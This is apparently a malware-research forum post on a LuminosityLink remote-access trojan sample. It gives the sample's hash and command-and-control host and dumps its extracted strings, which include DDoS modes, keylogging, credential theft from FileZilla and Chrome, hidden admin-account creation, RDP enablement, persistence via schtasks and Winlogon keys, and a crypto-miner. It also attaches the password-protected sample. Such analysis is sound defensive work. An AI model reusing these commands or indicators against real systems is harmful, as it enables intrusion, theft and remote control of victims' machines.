http://researchcenter.paloaltonetworks. ... iguration/
Very low detection rate 2/53:
cb599999063da4b3113b0b8dbefd39ec
Connects to:
mopol.mooo.com:8485 --> [212.7.208.101]
Strings:
Attached sample + sort of unpack (not really, .NET code is obfuscated)
RELPATH
SHADOW_COPY_DIRS
CACHE_BASE
PRIVATE_BINPATH
DYNAMIC_BASE
APP_CONFIG_FILE
APP_NAME
APPBASE
APP_CONFIG_BLOB
BINPATH_PROBE_ONLY
CODE_DOWNLOAD_DISABLED
DEV_PATH
DISALLOW_APP
DISALLOW_APP_REDIRECTS
DISALLOW_APP_BASE_PROBING
FORCE_CACHE_INSTALL
config\machine.config
MACHINE_CONFIG
HOST_CONFIG
( )
resource
System.EnterpriseServices.IRemoteDispatch
System.EnterpriseServices
nJsx
Xtz
count
index
"<>|
"<>|
"<>|
:*?\/
file:
http:
\\?\globalroot
*AllFiles*
*AllLocalFiles*
9I
Q8?
Q8?
System.Security.Permissions.IUnrestrictedPermission
l_intl.nlp
length
capacity
l_except.nlp
P?I
^$^
d, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
NLS
SER
DYNIL
REMOTE
BINARY
SOAP
REMOTINGCHANNELS
CACHE
RESMGRFILEFORMAT
PERF
CORRECTNESS
MEMORYFAILPOINT
$H
8$H
P$H
l$H
L%H
h%H
d.Resources
bytes
chars
charCount
charIndex
t(H
Q8?
t(H
-PZ
SMARTLOGS
8*I
name
nT)H
cultureName
culture.nlp
uX4HcE/7iL0AmtYmMOgBtkLdvJcWeXYjDUmbuE231fTnQ85NB73MqttiCb0OSU2q5vrQeH0r0qytJrPw+4dCGiTQuSbg+rxPixrGsdSxvzMlhRiJpo6h01wpS6s3cQiuhq5BvPFZE/qBAzNe74E5GXY9Z+rUFGy4L8k86OX2mLA0M/dF08ue+MUHgspbaJ6xyn8hCLSmPHACnOxigydMAg==
Desktop
Programs
Personal
MyDocuments
Favorites
Startup
Recent
SendTo
StartMenu
MyMusic
DesktopDirectory
MyComputer
Templates
ApplicationData
LocalApplicationData
InternetCache
Cookies
History
CommonApplicationData
System
ProgramFiles
MyPictures
CommonProgramFiles
n(JH
dIH
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
System.Void
System\CurrentControlSet\Control\Lsa
FIPSAlgorithmPolicy
Property can only be set to Nothing
WinForms_RecursiveFormCreate
WinForms_SeeInnerException
ARMEg
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
HTTP
BW Flood
http://
www.
StressTest
Attack on
started!
UDP
Connect/Disconnect
HTTP GET
HTTP POST
Slowloris
HTTP TIMEOUT&
finished successfully. Attacks Sent:
aborted successfully. Attacks Sent:
HEAD / HTTP/1.1
Host:
Content-length: 5235
User-Agent:
POST / HTTP/1.1
Host:
GET / HTTP/1.1
Host:
user-agent
udp
condis
httpget
posthttp
slowloris
arme
bwflood
SPECS
TCP
KILLPROC
BOTKILL
ADDHOST
BKFILE
FWFILE
SCLEAN
DELREG
Once
_CU
PRC
HOSTS
SETHOST
SWP
CLIP
N/A
SETCLIP
SHELL
STARTSHELL
DELFILE
STOPSHELL
RESTARTSHELL
WND
SWLIB
RWND
CWND
LDIR
REG
DEL
EXE
ZIP
ClientHandler
*.*
UserProfile
FLOC
Shell.Application
NameSpace
CopyHere
Items
FMC
FMDEL
Regedit
LOG
ManageWindow
ALLUSERSPROFILE
\Microsoft\Windows\Start Menu\Programs\Startup
.ini
STARTMAN
cManager
length
ProcessKill
Killed Process:
Unable to Kill Process:
. Error:
0.00
TaskMgr
netstat
-ano
SYSTEM
=*&
DLSpeed
cmd.exe
C:\
Session Ended
.log
QUEUEFILE
|
DECIDE
Queued
Bytes
D_=*
USERPROFILE
PROGRAMFILES
APPDATA
TEMP
DESKTOP
DOCUMENTS
PICTURES
EVERYTHING
SystemDrive
.exe
ProgramData
Logs\
Files\
Guard\
.jar
.INJ
.ENC
PWD
Guard
No Files Guarded
Removed Guarded File:
Error:
Guarding File:
SmartUpdate
Cannot Continue because Luminosity is injected into a third party process!
Unable to download file:
Client will be updated after a reboot!
HTTPControl
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
DOWNLOAD
UPDATE
UPDATEDNS
BackupDNS
UNINSTALL
Miner
STOP
CPUTHREADS
LuminosityCryptoMiner
Installed Miner:
Error
Could not Inject Miner! Check your config!
AllCPU
HALFCPU
ALLBUT1
HH:mm:ss
M03
mDown
mUp
START
TYP3
STARTDESK
rDesktop
===D~
image/jpeg
Installing
net user
/DELETE
Deleted User Account:
net user /add
Administrators
S-1-5-32-544
net localgroup
/add
User Added Successfully:
SOFTWARE\MICROSOFT\WINDOWS NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Changed Password for
to
Uninstalling
Command Handler Error:
x86
HOMEDRIVE
\Windows\Sysnative\rdpwrap.dll
\rdpwrap.dll
Error RDP Status:
RDP
STATUS=
Error Getting RDP Status:
LOG=
Error Managing RDP:
\Windows\Sysnative\rdpwrap.ini
\rdpwrap.ini
taskkill /f /fi
services eq TermService
net start TermService
net start DnsCache
net start CryptSvc
net start LanmanWorkstation
net start NlaSvc
Updated RDP Successfully!
RDP Manager...
-i -s
RDP Manager Installed Successfully!
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f/
Error Installing RDP Manager! Please try again!
Error Injecting RDP Manager
Error Installing RDP: Invalid File Download
Error Installing RDP: Something went wrong! Try again.
RegAsm.exe
vbc.exe
Elevation
Cannot elevate while injected into a process
/c
runas
User Denied Elevation!
Win32_UserAccount
Name
ACCOUNT=
.wav&
open new Type waveaudio Alias recsound
record recsound
save recsound
close recsound
AUDIO
STARTAUDIO
CFRAME
STARTCAM
DONE
INCFILE
Started
BYT3S
WRITEFILE
MM-dd-yyyy
SmartLogger
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
Speech
SAPI.Spvoice
speak
Shell
Shutdown
shutdown /s
Reboot
shutdown /r
Logoff
shutdown /l
Hibernate
shutdown /h /f
MonitorOn
MonitorOff
CMDOn
DisableCMD
CMDOff
RegeditOn
DisableRegistryTools
RegeditOff
SwapMouse
ResetMouse
ShowDesktop
Program Manager
HideDesktop
ShowTaskBar
HideTaskBar
EjectDisk
set CDAudio door open
CloseDisk
set CDAudio door closed
TaskmgrOn
DisableTaskMgr
TaskmgrOff
DelRestore
EnableInput
DisableInput
\\.\root\default
systemrestore
sequencenumber
Shell_traywnd
=()=
TR4MP
Removed
Blacklist
AntiProc
PASSWORDS
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
AntiMalware
Malware Cleaner: Processes Removed:
. Startup Items Removed:
Malware Cleaner cannot run when installation is disabled!
PROGRAMDATA
Luminosity
^$^
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Debugger
C:\Windows\System32\svchost.exe
LuminosityLink is Running
Uninstall
BID
Global\ $
\Windows\Sysnative\drivers\etc\hosts
CONNECT
1.5.1
Updating
Executed File
DownloadFile
ACT
RECONNECT
GETLOGS
KEYLOGS
READLOG
SAVELOG
DESK
WEBCAM
MANAGER
MICROPHONE
GUARDFILE
REMOVEGUARD
STARTCHAT
LISTGUARD
EMAILS
E471LE471L
GetSpecificInfo
VISIT
DELETE
KILLFILE
CHATMSG
MSGBOX
STARTPROXY
STOPPROXY
FILEDONE
OPEN
Transfer
STOPDDOS
ddos
SEARCHFILE
ENCFILE
QUEUE
MALCLEAN
HARDMALCLEAN
SEARCHLOGS
FUNCTIONS
SMARTUPDATE
UPLOADFILE
RND
YES
ExecutedFile
SavedFile
AMAL*
Proactive Anti-Malware has been activated!
Proactive Anti-Malware could Not be enabled because this client does Not use Luminosity's startup!
DMAL)
Proactive Anti-Malware has been disabled!
Proactive Anti-Malware could not be disabled because this client does not use Luminosity's startup!
SCRIPT
Script
MainError
Inj
RING
URALYA
FUCKUP
directshow
Load
InternetExplorer.Application
navigate2
Visible
Website
Opened:
True
Speed
Download Speed:
CPU
GPU
RAM
Sec
. Firewall:
Uptime
Window
Location
O.S
IDLE
Idle Time:
IND
CLIENTINFO
http://cachefly.cachefly.net/5mb.test
KB/sec
50Mbit+
Failed
NoSystemBattery
N/A (Desktop Machine)
###,###,##0 GB
Win32_Processor.deviceid="CPU0"
SELECT * FROM Win32_VideoController
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
SELECT * FROM FirewallProduct
System
System Up Time
Day(s)
Hours
Minutes
SOFTWARE
=P4CK3T=
8_=_8
\drivers\etc\hosts
netsh advfirewall firewall add rule name=
dir=out action=block program=
enable=yes
ms.ini
root\CIMV2
Description
virtual
vmware
parallel
vm additions
remotefx
generic
cirrus logic
standard vga
matrox
Desktop
Laptop
MessageBox
==================================================
EPWD
E471L
Email
Server
Email
Password
|P4$$
EmailRecovery
Invalid Email Password Recovery Download URL
PassRecovery&
Invalid Password Recovery Download URL
K3Y3,
SOFTWARE\Microsoft\Windows NT\CurrentVersion
DigitalProductId#
SELECT * FROM Win32_OperatingSystem
OSArchitecture
AppData
\FileZilla\recentservers.xmlK
<Host>(.+?)</Host>\s+.+\s+.+\s+.+\s+<User>(.+?)</User>\s+<Pass>(.+?)</Pass>
F4Z3Z1LLA
Z14L1
CHR0M3
URL
URL
User Name
Password
/stext "{0}"
csc.exe
AppLaunch.exe
chatBox
inputBox
rChat
Chat with
You:
DIE
"{0}"
d.Resources
CAM
CONFIG
RUNPE
SMARTLOGS
XML
" -a /a
schtasks /create /sc onlogon /tn
/rl highest /tr "'
' /startup" /f
%i%
%path%
schtasks /create /TN
/XML "
" /f6
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Userinit
userinit.exe,"
shell
explorer.exe,"
:Zone.Identifier
.config
/C ping 1.1.1.1 -n 1 -w
> Nul & Del "
EVERYONE
Process Manager
PTH
MTX
csrss
lsass
D4T4
DISCONNECT
CONNECTRESPONSE
SOCKS5
Server is already running!
PROXY
mopol.mooo.com
8485
client.exe
Client Monitor
Client
Monitor
clientmonitor.exe
59957fb1c88ac81ef84ff2c600ca6bd6f6f23495ed9cf62fcd7ac3d2213b1ad1
HOME
1sn
vH7B
NaN
Infinity
-Infinity
-Infinity
Infinity
http
https
ftp
file
gopher
nntp
news
mailto
uuid
telnet
ldap
net.tcp
net.pipe
vsmacros
0123456789ABCDEF
0123456789abcdef
00000000-0000-0000-C000-000000000046
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_CURRENT_USER\SOFTWARE
HOME-2342345
8;H
L;H
:H
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
True
False
ArgumentNull_Generic
[Resource lookup failed - null or empty resource name]
[Resource lookup failed - infinite recursion or critical failure detected.]
C:\ProgramData\Client\
C:\Users\Cris\AppData\Roaming\Monitor\
C:\Users\Cris\AppData\Roaming\Monitor\Logs\
C:\Users\Cris\AppData\Roaming\Monitor\Files\
C:\Users\Cris\AppData\Roaming\Monitor\Guard\
AccessControl_MustSpecifyLeafObjectAcl
AccessControl_MustSpecifyContainerAcl
AccessControl_MustSpecifyNonDirectoryObjectAcl
AccessControl_MustSpecifyDirectoryObjectAcl
AccessControl_InvalidOwner
AccessControl_InvalidGroup
AccessControl_UnexpectedError
Argument_InvalidName
AccessControl_NoAssociatedSecurity
AccessControl_InvalidHandle
SeSecurityPrivilege
System.Diagnostics.Trace.CorrelationManagerSlot
x1I
TcpClient
maxdatasize
tracemode
System.Configuration.Internal.ConfigurationManagerInternal, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
system.diagnostics
level
\?:*"<>|
codepages.nlp
NLS_CodePage_{0}_{1}_{2}_{3}_{4}
args
format
-Infinity
Infinity
C:\Windows\Sysnative\drivers\etc\hosts
51372AE0-CAE7-11CF-BE81-00AA00A2FA25
000001ce-0000-0000-C000-000000000046
path2
path1
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
Q8?
GetType
GetHashCode
Q8?
RemoteActivationService.rem
property name
prop
LeaseLifeTimeServiceProperty
soap:
http://sch
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
dII
C:\Users\Cris\AppData\Roaming\Monitor\Guard\1
PLI
\JI
|JI
n\MI
QOn
Put
Delete
Get
\wminet_utils.dll
ResetSecurity
SetSecurity
BlessIWbemServices
BlessIWbemServicesObject
GetPropertyHandle
WritePropertyValue
Clone
VerifyClientKey
GetQualifierSet
GetNames
BeginEnumeration
Next
EndEnumeration
GetPropertyQualifierSet
GetObjectText
SpawnDerivedClass
SpawnInstance
CompareTo
GetPropertyOrigin
InheritsFrom
GetMethod
PutMethod
DeleteMethod
BeginMethodEnumeration
NextMethod
EndMethodEnumeration
GetMethodQualifierSet
GetMethodOrigin
QualifierSet_Get
QualifierSet_Put
QualifierSet_Delete
QualifierSet_GetNames
QualifierSet_BeginEnumeration
QualifierSet_Next
QualifierSet_EndEnumeration
GetCurrentApartmentType
GetDemultiplexedStub
CreateInstanceEnumWmi
CreateClassEnumWmi
ExecQueryWmi
ExecNotificationQueryWmi
PutInstanceWmi
PutClassWmi
CloneEnumWbemClassObject
ConnectServerWmi
C
Attachments
pass: infected
(1.24 MiB) Downloaded 94 times